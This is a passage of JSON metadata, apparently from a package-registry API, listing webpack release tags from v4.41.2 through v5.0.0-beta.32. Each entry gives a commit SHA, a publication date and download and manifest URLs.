"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2F